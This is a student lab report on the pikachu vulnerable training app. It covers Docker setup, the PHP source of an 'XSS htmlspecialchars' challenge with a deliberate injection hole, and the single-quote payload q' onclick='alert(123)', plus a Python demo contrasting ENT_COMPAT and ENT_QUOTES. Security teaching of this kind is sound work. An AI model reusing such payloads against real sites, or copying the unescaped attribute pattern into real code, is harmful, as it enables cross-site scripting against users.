1 / Short-answer questions
1. Build the pikachu image with docker
(1) Search for pikachu
docker search pikachu
(2) Pull the image
docker pull area39/pikachu
(3) Start the pikachu container
docker run --name piakchu -d -p 8000:80 area39/pikachu
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker search pikachu
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
area39/pikachu https://github.com/zhuifengshaonianhanlu/pik… 6
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker pull area39/pikachu
Using default tag: latest
latest: Pulling from area39/pikachu
Digest: sha256:e9748879af76b68235a6ec66ce28b048323ac31f7f33065d83727cacb3998e05
Status: Downloaded newer image for area39/pikachu:latest
docker.io/area39/pikachu:latest
┌──(root💀pinginglab)-[/home/pinginglab]
└─# docker run --name piakchu -d -p 8000:80 area39/pikachu
a3e8853a8e0b92206017a64b10199a68843a311d78462fa98f309636c4c16a0d
Started successfully; the application was then opened in the browser:
2. Enter the pikachu container with vscode
(1) Start vscode as the root user
code --user-data-dir=/root
(2) Install the Docker extension
(3) Use "Attach Shell" to get a shell inside the pikachu container
Browse the container's files through "Files"
3. Read the source of pikachu's "XSS - htmlspecialchars" challenge and find a bypass
(1) Read the code
<?php
/**
* Created by runner.han
* There is nothing new under the sun
*/
$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
if ($SELF_PAGE = "xss_02.php"){
$ACTIVE = array('','','','','','','','active open','','','','','','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}
$PIKA_ROOT_DIR = "../../";
include_once $PIKA_ROOT_DIR.'header.php';
$html='';
$html1='';
$html2='';
if(isset($_GET['submit'])){
if(empty($_GET['message'])){
$html.="<p class='notice'>输入点啥吧!</p>";
}else {
// htmlspecialchars() is applied here; does that make it safe? By default htmlspecialchars does not encode '
$message=htmlspecialchars($_GET['message']);
$html1.="<p class='notice'>你的输入已经被记录:</p>";
// the processed input is written into the value attribute of an input tag; try: ' onclick='alert(111)'
// $html2.="<input class='input' type='text' name='inputvalue' readonly='readonly' value='{$message}' style='margin-left:120px;display:block;background-color:#c0c0c0;border-style:none;'/>";
$html2.="<a href='{$message}'>{$message}</a>";
}
}
?>
<div class="main-content">
<div class="main-content-inner">
<div class="breadcrumbs ace-save-state" id="breadcrumbs">
<ul class="breadcrumb">
<li>
<i class="ace-icon fa fa-home home-icon"></i>
<a href="xss.php">xss</a>
</li>
<li class="active">xss之htmlspecialchars</li>
</ul><!-- /.breadcrumb -->
<a href="#" style="float:right" data-container="body" data-toggle="popover" data-placement="bottom" title="tips(再点一下关闭)"
data-content="先去查一下htmlspecialchars这个方法的含义">
点一下提示~
</a>
</div>
<div class="page-content">
<div id="xssr_main">
<p class="xssr_title">人生之所有苦短,是因为你的xss学习的还不够好</p>
<form method="get">
<input class="xssr_in" type="text" name="message" />
<input class="xssr_submit" type="submit" name="submit" value="submit" />
</form>
<?php
echo $html;
echo $html1;
echo $html2;
?>
</div>
</div><!-- /.page-content -->
</div>
</div><!-- /.main-content -->
<?php
include_once $PIKA_ROOT_DIR.'footer.php';
?>
(2) htmlspecialchars bypass
The htmlspecialchars() function converts predefined characters into HTML entities.
The predefined characters are:
1. & (ampersand) becomes &amp;
2. " (double quote) becomes &quot;
3. ' (single quote) becomes &#039;
4. < (less than) becomes &lt;
5. > (greater than) becomes &gt;
Available quote styles:
ENT_COMPAT: the default, encodes only double quotes
ENT_QUOTES: encodes both double and single quotes (recommended)
ENT_NOQUOTES: encodes no quotes at all
Taking pikachu as the example again, open "XSS - htmlspecialchars".
————————————————
Copyright notice: this part is an original article by the CSDN blogger "以菜之名", licensed under CC 4.0 BY-SA; reproductions must include the link to the original and this notice.
Original link: https://blog.csdn.net/qq_44720671/article/details/89666761
<?php
echo $html;
echo $html1;
echo $html2;
?>
(3)
$html1.="<p class='notice'>你的输入已经被记录:</p>";
// the processed input is written into the value attribute of an input tag; try: ' onclick='alert(111)'
// $html2.="<input class='input' type='text' name='inputvalue' readonly='readonly' value='{$message}' style='margin-left:120px;display:block;background-color:#c0c0c0;border-style:none;'/>";
$html2.="<a href='{$message}'>{$message}</a>";
From the code we can see that a single quote (') can be used to break out of value='{$message}'; the browser then parses the output as:
<a href="q" onclick="alert(123)" '="">q' onclick='alert(123)'
4. Give the payload used and a screenshot of the pop-up
Payload used:
q' onclick='alert(123)'
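As an added example (not code from pikachu or from this report), the following Python models htmlspecialchars() with PHP's three quote flags, feeds the report's payload through the same single-quoted-attribute sink as xss_02.php, and uses an HTML parser to show which attributes a browser would actually see: with ENT_COMPAT the anchor gains an onclick handler, with ENT_QUOTES it keeps only href. The flag values mirror PHP's constants (ENT_NOQUOTES=0, ENT_COMPAT=2, ENT_QUOTES=3); ENT_COMPAT was the default before PHP 8.1, which switched the default to ENT_QUOTES.

```python
from html.parser import HTMLParser

# Flag values mirror PHP's constants: bit 2 encodes the double quote, bit 1 the single quote.
ENT_NOQUOTES = 0
ENT_COMPAT = 2      # PHP default before 8.1: only the double quote is encoded
ENT_QUOTES = 3      # both quote characters encoded (the corrected setting, PHP 8.1+ default)

def htmlspecialchars(s: str, flags: int = ENT_COMPAT) -> str:
    """Model of PHP htmlspecialchars(): &, <, > are always encoded; quotes depend on flags."""
    out = s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    if flags & 2:
        out = out.replace('"', "&quot;")
    if flags & 1:
        out = out.replace("'", "&#039;")
    return out

def render_anchor(message: str, flags: int = ENT_COMPAT) -> str:
    """Same sink as pikachu's xss_02.php: the escaped value lands inside a single-quoted attribute."""
    m = htmlspecialchars(message, flags)
    return f"<a href='{m}'>{m}</a>"

class _AnchorAttrs(HTMLParser):
    """Collect the attributes the parser assigns to the first <a> tag, as a browser would."""
    def __init__(self):
        super().__init__()
        self.attrs = None
    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)

def anchor_attributes(markup: str) -> dict:
    p = _AnchorAttrs()
    p.feed(markup)
    p.close()
    return p.attrs or {}

# Constructed input: the report's payload, where the single quote closes href='...'
PAYLOAD = "q' onclick='alert(123)'"

def injected_handler(message: str, flags: int) -> bool:
    """True when the rendered anchor carries an event-handler attribute it should not have."""
    return any(name.startswith("on") for name in anchor_attributes(render_anchor(message, flags)))

if __name__ == "__main__":
    for name, flags in (("ENT_COMPAT", ENT_COMPAT), ("ENT_QUOTES", ENT_QUOTES)):
        print(name, render_anchor(PAYLOAD, flags), "-> handler injected:", injected_handler(PAYLOAD, flags))
```

A double-quote variant of the same payload is neutralised even under ENT_COMPAT, which is why the single quote is the gap in this sink.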
When writing the lab report, collect the steps, results and reasoning from the whole exercise into a Word, PDF or PPT document and upload it; name the document "Name-AssignmentName".